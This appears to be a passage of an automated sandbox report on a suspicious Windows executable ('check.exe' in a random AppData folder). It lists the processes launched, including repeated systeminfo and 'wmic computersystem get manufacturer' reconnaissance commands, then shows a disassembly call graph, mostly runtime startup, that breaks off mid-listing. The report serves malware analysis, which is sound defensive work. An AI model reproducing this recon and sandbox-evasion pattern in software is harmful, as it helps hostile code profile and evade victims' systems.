                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:11:11:37
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 3120 -s 968
                                                                                                                                                                                                              Imagebase:0x7ff6e8290000
                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                              Start time:11:11:45
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                              Imagebase:0x7ff669bc0000
                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:11:11:45
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                              Start time:11:11:46
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                              Imagebase:0x7ff637610000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:11:11:46
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                              Start time:11:11:46
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                              Imagebase:0x7ff7afb80000
                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:11:11:47
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff61e8e0000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:11:11:50
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7100 -s 968
                                                                                                                                                                                                              Imagebase:0x7ff6e8290000
                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:11:11:55
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                              Imagebase:0x7ff669bc0000
                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                              Start time:11:11:55
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff779180000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:11:11:55
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                              Imagebase:0x7ff637610000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                              Start time:11:11:55
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:11:11:55
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                              Imagebase:0x7ff7afb80000
                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                              Start time:11:11:58
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 5536 -s 1012
                                                                                                                                                                                                              Imagebase:0x7ff6e8290000
                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:9.7%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:14.9%
                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                Total number of Limit Nodes:45
                                                                                                                                                                                                                execution_graph 19335 7ff61e8ecb50 19336 7ff61e8ecb60 19335->19336 19352 7ff61e8f9ba8 19336->19352 19338 7ff61e8ecb6c 19358 7ff61e8ece48 19338->19358 19340 7ff61e8ed12c 7 API calls 19342 7ff61e8ecc05 19340->19342 19341 7ff61e8ecb84 _RTC_Initialize 19350 7ff61e8ecbd9 19341->19350 19363 7ff61e8ecff8 19341->19363 19344 7ff61e8ecb99 19366 7ff61e8f9014 19344->19366 19350->19340 19351 7ff61e8ecbf5 19350->19351 19353 7ff61e8f9bb9 19352->19353 19354 7ff61e8f4f08 _get_daylight 11 API calls 19353->19354 19357 7ff61e8f9bc1 19353->19357 19355 7ff61e8f9bd0 19354->19355 19356 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 19355->19356 19356->19357 19357->19338 19359 7ff61e8ece59 19358->19359 19362 7ff61e8ece5e __scrt_acquire_startup_lock 19358->19362 19360 7ff61e8ed12c 7 API calls 19359->19360 19359->19362 19361 7ff61e8eced2 19360->19361 19362->19341 19391 7ff61e8ecfbc 19363->19391 19365 7ff61e8ed001 19365->19344 19367 7ff61e8f9034 19366->19367 19368 7ff61e8ecba5 19366->19368 19369 7ff61e8f9052 GetModuleFileNameW 19367->19369 19370 7ff61e8f903c 19367->19370 19368->19350 19390 7ff61e8ed0cc InitializeSListHead 19368->19390 19374 7ff61e8f907d 19369->19374 19371 7ff61e8f4f08 _get_daylight 11 API calls 19370->19371 19372 7ff61e8f9041 19371->19372 19373 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 19372->19373 19373->19368 19406 7ff61e8f8fb4 19374->19406 19377 7ff61e8f90c5 19378 7ff61e8f4f08 _get_daylight 11 API calls 19377->19378 19379 7ff61e8f90ca 19378->19379 19380 7ff61e8fa948 __free_lconv_num 11 API calls 19379->19380 19380->19368 19381 7ff61e8f90dd 19382 7ff61e8f90ff 19381->19382 19384 7ff61e8f9144 19381->19384 19385 7ff61e8f912b 19381->19385 19383 7ff61e8fa948 __free_lconv_num 11 API calls 19382->19383 19383->19368 19387 7ff61e8fa948 __free_lconv_num 11 API calls 19384->19387 19386 7ff61e8fa948 __free_lconv_num 11 API calls 19385->19386 19388 7ff61e8f9134 19386->19388 19387->19382 19389 7ff61e8fa948 __free_lconv_num 11 API calls 19388->19389 19389->19368 19392 7ff61e8ecfd6 19391->19392 19394 7ff61e8ecfcf 19391->19394 19395 7ff61e8fa1ec 19392->19395 19394->19365 19398 7ff61e8f9e28 19395->19398 19405 7ff61e9002d8 EnterCriticalSection 19398->19405 19407 7ff61e8f8fcc 19406->19407 19408 7ff61e8f9004 19406->19408 19407->19408 19409 7ff61e8feb98 _get_daylight 11 API calls 19407->19409 19408->19377 19408->19381 19410 7ff61e8f8ffa 19409->19410 19411 7ff61e8fa948 __free_lconv_num 11 API calls 19410->19411 19411->19408 18943 7ff61e8fafd0 18944 7ff61e8fafd5 18943->18944 18945 7ff61e8fafea 18943->18945 18949 7ff61e8faff0 18944->18949 18950 7ff61e8fb032 18949->18950 18951 7ff61e8fb03a 18949->18951 18953 7ff61e8fa948 __free_lconv_num 11 API calls 18950->18953 18952 7ff61e8fa948 __free_lconv_num 11 API calls 18951->18952 18954 7ff61e8fb047 18952->18954 18953->18951 18955 7ff61e8fa948 __free_lconv_num 11 API calls 18954->18955 18956 7ff61e8fb054 18955->18956 18957 7ff61e8fa948 __free_lconv_num 11 API calls 18956->18957 18958 7ff61e8fb061 18957->18958 18959 7ff61e8fa948 __free_lconv_num 11 API calls 18958->18959 18960 7ff61e8fb06e 18959->18960 18961 7ff61e8fa948 __free_lconv_num 11 API calls 18960->18961 18962 7ff61e8fb07b 18961->18962 18963 7ff61e8fa948 __free_lconv_num 11 API calls 18962->18963 18964 7ff61e8fb088 18963->18964 18965 7ff61e8fa948 __free_lconv_num 11 API calls 18964->18965 18966 7ff61e8fb095 18965->18966 18967 7ff61e8fa948 __free_lconv_num 11 API calls 18966->18967 18968 7ff61e8fb0a5 18967->18968 18969 7ff61e8fa948 __free_lconv_num 11 API calls 18968->18969 18970 7ff61e8fb0b5 18969->18970 18975 7ff61e8fae94 18970->18975 18989 7ff61e9002d8 EnterCriticalSection 18975->18989 19415 7ff61e8f9d50 19418 7ff61e8f9ccc 19415->19418 19425 7ff61e9002d8 EnterCriticalSection 19418->19425 18991 7ff61e90abe3 18993 7ff61e90abf3 18991->18993 18995 7ff61e8f5478 LeaveCriticalSection 18993->18995 19460 7ff61e90ad69 19463 7ff61e8f5478 LeaveCriticalSection 19460->19463 16148 7ff61e8ecc3c 16171 7ff61e8ece0c 16148->16171 16151 7ff61e8ecd88 16329 7ff61e8ed12c IsProcessorFeaturePresent 16151->16329 16152 7ff61e8ecc58 __scrt_acquire_startup_lock 16154 7ff61e8ecd92 16152->16154 16156 7ff61e8ecc76 16152->16156 16155 7ff61e8ed12c 7 API calls 16154->16155 16159 7ff61e8ecd9d __CxxCallCatchBlock 16155->16159 16157 7ff61e8ecc9b 16156->16157 16162 7ff61e8eccb8 __scrt_release_startup_lock 16156->16162 16314 7ff61e8f97d8 16156->16314 16160 7ff61e8ecd21 16177 7ff61e8ed274 16160->16177 16162->16160 16318 7ff61e8f9b2c 16162->16318 16163 7ff61e8ecd26 16180 7ff61e8e1000 16163->16180 16168 7ff61e8ecd49 16168->16159 16325 7ff61e8ecf90 16168->16325 16172 7ff61e8ece14 16171->16172 16173 7ff61e8ece20 __scrt_dllmain_crt_thread_attach 16172->16173 16174 7ff61e8ece2d 16173->16174 16176 7ff61e8ecc50 16173->16176 16174->16176 16336 7ff61e8ed888 16174->16336 16176->16151 16176->16152 16363 7ff61e90a4d0 16177->16363 16179 7ff61e8ed28b GetStartupInfoW 16179->16163 16181 7ff61e8e1009 16180->16181 16365 7ff61e8f5484 16181->16365 16183 7ff61e8e37fb 16372 7ff61e8e36b0 16183->16372 16187 7ff61e8ec550 _log10_special 8 API calls 16191 7ff61e8e3ca7 16187->16191 16189 7ff61e8e391b 16541 7ff61e8e45c0 16189->16541 16190 7ff61e8e383c 16532 7ff61e8e1c80 16190->16532 16323 7ff61e8ed2b8 GetModuleHandleW 16191->16323 16194 7ff61e8e385b 16444 7ff61e8e8830 16194->16444 16197 7ff61e8e396a 16564 7ff61e8e2710 16197->16564 16199 7ff61e8e388e 16208 7ff61e8e38bb __vcrt_freefls 16199->16208 16536 7ff61e8e89a0 16199->16536 16201 7ff61e8e395d 16202 7ff61e8e3962 16201->16202 16203 7ff61e8e3984 16201->16203 16560 7ff61e8f004c 16202->16560 16204 7ff61e8e1c80 49 API calls 16203->16204 16207 7ff61e8e39a3 16204->16207 16213 7ff61e8e1950 115 API calls 16207->16213 16209 7ff61e8e8830 14 API calls 16208->16209 16216 7ff61e8e38de __vcrt_freefls 16208->16216 16209->16216 16211 7ff61e8e3a0b 16212 7ff61e8e89a0 40 API calls 16211->16212 16214 7ff61e8e3a17 16212->16214 16215 7ff61e8e39ce 16213->16215 16217 7ff61e8e89a0 40 API calls 16214->16217 16215->16194 16218 7ff61e8e39de 16215->16218 16222 7ff61e8e390e __vcrt_freefls 16216->16222 16575 7ff61e8e8940 16216->16575 16219 7ff61e8e3a23 16217->16219 16220 7ff61e8e2710 54 API calls 16218->16220 16221 7ff61e8e89a0 40 API calls 16219->16221 16228 7ff61e8e3808 __vcrt_freefls 16220->16228 16221->16222 16223 7ff61e8e8830 14 API calls 16222->16223 16224 7ff61e8e3a3b 16223->16224 16225 7ff61e8e3b2f 16224->16225 16226 7ff61e8e3a60 __vcrt_freefls 16224->16226 16227 7ff61e8e2710 54 API calls 16225->16227 16229 7ff61e8e8940 40 API calls 16226->16229 16239 7ff61e8e3aab 16226->16239 16227->16228 16228->16187 16229->16239 16230 7ff61e8e8830 14 API calls 16231 7ff61e8e3bf4 __vcrt_freefls 16230->16231 16232 7ff61e8e3d41 16231->16232 16233 7ff61e8e3c46 16231->16233 16582 7ff61e8e44e0 16232->16582 16235 7ff61e8e3cd4 16233->16235 16236 7ff61e8e3c50 16233->16236 16237 7ff61e8e8830 14 API calls 16235->16237 16457 7ff61e8e90e0 16236->16457 16242 7ff61e8e3ce0 16237->16242 16238 7ff61e8e3d4f 16243 7ff61e8e3d65 16238->16243 16244 7ff61e8e3d71 16238->16244 16239->16230 16245 7ff61e8e3c61 16242->16245 16248 7ff61e8e3ced 16242->16248 16585 7ff61e8e4630 16243->16585 16247 7ff61e8e1c80 49 API calls 16244->16247 16250 7ff61e8e2710 54 API calls 16245->16250 16257 7ff61e8e3cc8 __vcrt_freefls 16247->16257 16251 7ff61e8e1c80 49 API calls 16248->16251 16250->16228 16254 7ff61e8e3d0b 16251->16254 16252 7ff61e8e3dc4 16507 7ff61e8e9390 16252->16507 16256 7ff61e8e3d12 16254->16256 16254->16257 16260 7ff61e8e2710 54 API calls 16256->16260 16257->16252 16258 7ff61e8e3da7 SetDllDirectoryW LoadLibraryExW 16257->16258 16258->16252 16259 7ff61e8e3dd7 SetDllDirectoryW 16262 7ff61e8e3e0a 16259->16262 16303 7ff61e8e3e5a 16259->16303 16260->16228 16263 7ff61e8e8830 14 API calls 16262->16263 16271 7ff61e8e3e16 __vcrt_freefls 16263->16271 16264 7ff61e8e4008 16265 7ff61e8e4012 PostMessageW GetMessageW 16264->16265 16266 7ff61e8e4035 16264->16266 16265->16266 16662 7ff61e8e3360 16266->16662 16267 7ff61e8e3f1b 16512 7ff61e8e33c0 16267->16512 16274 7ff61e8e3ef2 16271->16274 16278 7ff61e8e3e4e 16271->16278 16277 7ff61e8e8940 40 API calls 16274->16277 16277->16303 16278->16303 16588 7ff61e8e6dc0 16278->16588 16283 7ff61e8e6fc0 FreeLibrary 16286 7ff61e8e405b 16283->16286 16291 7ff61e8e3e81 16294 7ff61e8e3ea2 16291->16294 16305 7ff61e8e3e85 16291->16305 16609 7ff61e8e6e00 16291->16609 16294->16305 16628 7ff61e8e71b0 16294->16628 16303->16264 16303->16267 16305->16303 16644 7ff61e8e2a50 16305->16644 16315 7ff61e8f97dd 16314->16315 16316 7ff61e8f980e 16314->16316 16315->16316 18752 7ff61e8f5410 16315->18752 16316->16162 16319 7ff61e8f9b64 16318->16319 16320 7ff61e8f9b43 16318->16320 16321 7ff61e8fa3d8 45 API calls 16319->16321 16320->16160 16322 7ff61e8f9b69 16321->16322 16324 7ff61e8ed2c9 16323->16324 16324->16168 16327 7ff61e8ecfa1 16325->16327 16326 7ff61e8ecd60 16326->16157 16327->16326 16328 7ff61e8ed888 7 API calls 16327->16328 16328->16326 16330 7ff61e8ed152 __CxxCallCatchBlock __scrt_get_show_window_mode 16329->16330 16331 7ff61e8ed171 RtlCaptureContext RtlLookupFunctionEntry 16330->16331 16332 7ff61e8ed19a RtlVirtualUnwind 16331->16332 16333 7ff61e8ed1d6 __scrt_get_show_window_mode 16331->16333 16332->16333 16334 7ff61e8ed208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16333->16334 16335 7ff61e8ed256 __CxxCallCatchBlock 16334->16335 16335->16154 16337 7ff61e8ed890 16336->16337 16338 7ff61e8ed89a 16336->16338 16342 7ff61e8edc24 16337->16342 16338->16176 16343 7ff61e8edc33 16342->16343 16344 7ff61e8ed895 16342->16344 16350 7ff61e8ede60 16343->16350 16346 7ff61e8edc90 16344->16346 16347 7ff61e8edcbb 16346->16347 16348 7ff61e8edc9e DeleteCriticalSection 16347->16348 16349 7ff61e8edcbf 16347->16349 16348->16347 16349->16338 16354 7ff61e8edcc8 16350->16354 16355 7ff61e8edd0c __vcrt_FlsAlloc 16354->16355 16361 7ff61e8eddb2 TlsFree 16354->16361 16356 7ff61e8edd3a LoadLibraryExW 16355->16356 16357 7ff61e8eddf9 GetProcAddress 16355->16357 16355->16361 16362 7ff61e8edd7d LoadLibraryExW 16355->16362 16358 7ff61e8edd5b GetLastError 16356->16358 16359 7ff61e8eddd9 16356->16359 16357->16361 16358->16355 16359->16357 16360 7ff61e8eddf0 FreeLibrary 16359->16360 16360->16357 16362->16355 16362->16359 16364 7ff61e90a4c0 16363->16364 16364->16179 16364->16364 16366 7ff61e8ff480 16365->16366 16368 7ff61e8ff526 16366->16368 16369 7ff61e8ff4d3 16366->16369 16367 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16371 7ff61e8ff4fc 16367->16371 16675 7ff61e8ff358 16368->16675 16369->16367 16371->16183 16683 7ff61e8ec850 16372->16683 16375 7ff61e8e3710 16685 7ff61e8e9280 FindFirstFileExW 16375->16685 16376 7ff61e8e36eb GetLastError 16690 7ff61e8e2c50 16376->16690 16380 7ff61e8e3723 16705 7ff61e8e9300 CreateFileW 16380->16705 16381 7ff61e8e377d 16716 7ff61e8e9440 16381->16716 16382 7ff61e8ec550 _log10_special 8 API calls 16385 7ff61e8e37b5 16382->16385 16385->16228 16394 7ff61e8e1950 16385->16394 16387 7ff61e8e378b 16388 7ff61e8e3706 16387->16388 16391 7ff61e8e2810 49 API calls 16387->16391 16388->16382 16389 7ff61e8e3734 16708 7ff61e8e2810 16389->16708 16390 7ff61e8e374c __vcrt_FlsAlloc 16390->16381 16391->16388 16395 7ff61e8e45c0 108 API calls 16394->16395 16396 7ff61e8e1985 16395->16396 16397 7ff61e8e1c43 16396->16397 16398 7ff61e8e7f90 83 API calls 16396->16398 16399 7ff61e8ec550 _log10_special 8 API calls 16397->16399 16401 7ff61e8e19cb 16398->16401 16400 7ff61e8e1c5e 16399->16400 16400->16189 16400->16190 16443 7ff61e8e1a03 16401->16443 17089 7ff61e8f06d4 16401->17089 16403 7ff61e8f004c 74 API calls 16403->16397 16404 7ff61e8e19e5 16405 7ff61e8e19e9 16404->16405 16406 7ff61e8e1a08 16404->16406 16408 7ff61e8f4f08 _get_daylight 11 API calls 16405->16408 17093 7ff61e8f039c 16406->17093 16410 7ff61e8e19ee 16408->16410 17096 7ff61e8e2910 16410->17096 16411 7ff61e8e1a45 16417 7ff61e8e1a7b 16411->16417 16418 7ff61e8e1a5c 16411->16418 16412 7ff61e8e1a26 16414 7ff61e8f4f08 _get_daylight 11 API calls 16412->16414 16415 7ff61e8e1a2b 16414->16415 16416 7ff61e8e2910 54 API calls 16415->16416 16416->16443 16419 7ff61e8e1c80 49 API calls 16417->16419 16420 7ff61e8f4f08 _get_daylight 11 API calls 16418->16420 16421 7ff61e8e1a92 16419->16421 16422 7ff61e8e1a61 16420->16422 16423 7ff61e8e1c80 49 API calls 16421->16423 16424 7ff61e8e2910 54 API calls 16422->16424 16425 7ff61e8e1add 16423->16425 16424->16443 16426 7ff61e8f06d4 73 API calls 16425->16426 16427 7ff61e8e1b01 16426->16427 16428 7ff61e8e1b35 16427->16428 16429 7ff61e8e1b16 16427->16429 16430 7ff61e8f039c _fread_nolock 53 API calls 16428->16430 16431 7ff61e8f4f08 _get_daylight 11 API calls 16429->16431 16432 7ff61e8e1b4a 16430->16432 16433 7ff61e8e1b1b 16431->16433 16434 7ff61e8e1b6f 16432->16434 16435 7ff61e8e1b50 16432->16435 16436 7ff61e8e2910 54 API calls 16433->16436 17111 7ff61e8f0110 16434->17111 16437 7ff61e8f4f08 _get_daylight 11 API calls 16435->16437 16436->16443 16439 7ff61e8e1b55 16437->16439 16441 7ff61e8e2910 54 API calls 16439->16441 16441->16443 16442 7ff61e8e2710 54 API calls 16442->16443 16443->16403 16445 7ff61e8e883a 16444->16445 16446 7ff61e8e9390 2 API calls 16445->16446 16447 7ff61e8e8859 GetEnvironmentVariableW 16446->16447 16448 7ff61e8e88c2 16447->16448 16449 7ff61e8e8876 ExpandEnvironmentStringsW 16447->16449 16450 7ff61e8ec550 _log10_special 8 API calls 16448->16450 16449->16448 16451 7ff61e8e8898 16449->16451 16453 7ff61e8e88d4 16450->16453 16452 7ff61e8e9440 2 API calls 16451->16452 16454 7ff61e8e88aa 16452->16454 16453->16199 16455 7ff61e8ec550 _log10_special 8 API calls 16454->16455 16456 7ff61e8e88ba 16455->16456 16456->16199 16458 7ff61e8e90f5 16457->16458 17329 7ff61e8e8570 GetCurrentProcess OpenProcessToken 16458->17329 16461 7ff61e8e8570 7 API calls 16462 7ff61e8e9121 16461->16462 16463 7ff61e8e9154 16462->16463 16464 7ff61e8e913a 16462->16464 16466 7ff61e8e26b0 48 API calls 16463->16466 16465 7ff61e8e26b0 48 API calls 16464->16465 16467 7ff61e8e9152 16465->16467 16468 7ff61e8e9167 LocalFree LocalFree 16466->16468 16467->16468 16469 7ff61e8e9183 16468->16469 16471 7ff61e8e918f 16468->16471 17339 7ff61e8e2b50 16469->17339 16472 7ff61e8ec550 _log10_special 8 API calls 16471->16472 16473 7ff61e8e3c55 16472->16473 16473->16245 16474 7ff61e8e8660 16473->16474 16475 7ff61e8e8678 16474->16475 16476 7ff61e8e869c 16475->16476 16477 7ff61e8e86fa GetTempPathW GetCurrentProcessId 16475->16477 16479 7ff61e8e8830 14 API calls 16476->16479 17348 7ff61e8e25c0 16477->17348 16480 7ff61e8e86a8 16479->16480 17355 7ff61e8e81d0 16480->17355 16485 7ff61e8e86e8 __vcrt_freefls 16491 7ff61e8e87d4 __vcrt_freefls 16485->16491 16486 7ff61e8e8728 __vcrt_freefls 16494 7ff61e8e8765 __vcrt_freefls 16486->16494 17352 7ff61e8f8b68 16486->17352 16489 7ff61e8e86ce __vcrt_freefls 16489->16477 16497 7ff61e8e86dc 16489->16497 16493 7ff61e8ec550 _log10_special 8 API calls 16491->16493 16496 7ff61e8e3cbb 16493->16496 16494->16491 16499 7ff61e8e9390 2 API calls 16494->16499 16496->16245 16496->16257 16498 7ff61e8e2810 49 API calls 16497->16498 16498->16485 16500 7ff61e8e87b1 16499->16500 16501 7ff61e8e87e9 16500->16501 16502 7ff61e8e87b6 16500->16502 16503 7ff61e8f8238 38 API calls 16501->16503 16504 7ff61e8e9390 2 API calls 16502->16504 16503->16491 16505 7ff61e8e87c6 16504->16505 16506 7ff61e8f8238 38 API calls 16505->16506 16506->16491 16508 7ff61e8e93b2 MultiByteToWideChar 16507->16508 16510 7ff61e8e93d6 16507->16510 16508->16510 16511 7ff61e8e93ec __vcrt_freefls 16508->16511 16509 7ff61e8e93f3 MultiByteToWideChar 16509->16511 16510->16509 16510->16511 16511->16259 16524 7ff61e8e33ce __scrt_get_show_window_mode 16512->16524 16513 7ff61e8ec550 _log10_special 8 API calls 16515 7ff61e8e3664 16513->16515 16514 7ff61e8e35c7 16514->16513 16515->16228 16531 7ff61e8e90c0 LocalFree 16515->16531 16517 7ff61e8e1c80 49 API calls 16517->16524 16518 7ff61e8e35e2 16520 7ff61e8e2710 54 API calls 16518->16520 16520->16514 16523 7ff61e8e35c9 16526 7ff61e8e2710 54 API calls 16523->16526 16524->16514 16524->16517 16524->16518 16524->16523 16525 7ff61e8e2a50 54 API calls 16524->16525 16529 7ff61e8e35d0 16524->16529 17644 7ff61e8e4560 16524->17644 17650 7ff61e8e7e20 16524->17650 17661 7ff61e8e1600 16524->17661 17709 7ff61e8e7120 16524->17709 17713 7ff61e8e4190 16524->17713 17757 7ff61e8e4450 16524->17757 16525->16524 16526->16514 16530 7ff61e8e2710 54 API calls 16529->16530 16530->16514 16533 7ff61e8e1ca5 16532->16533 16534 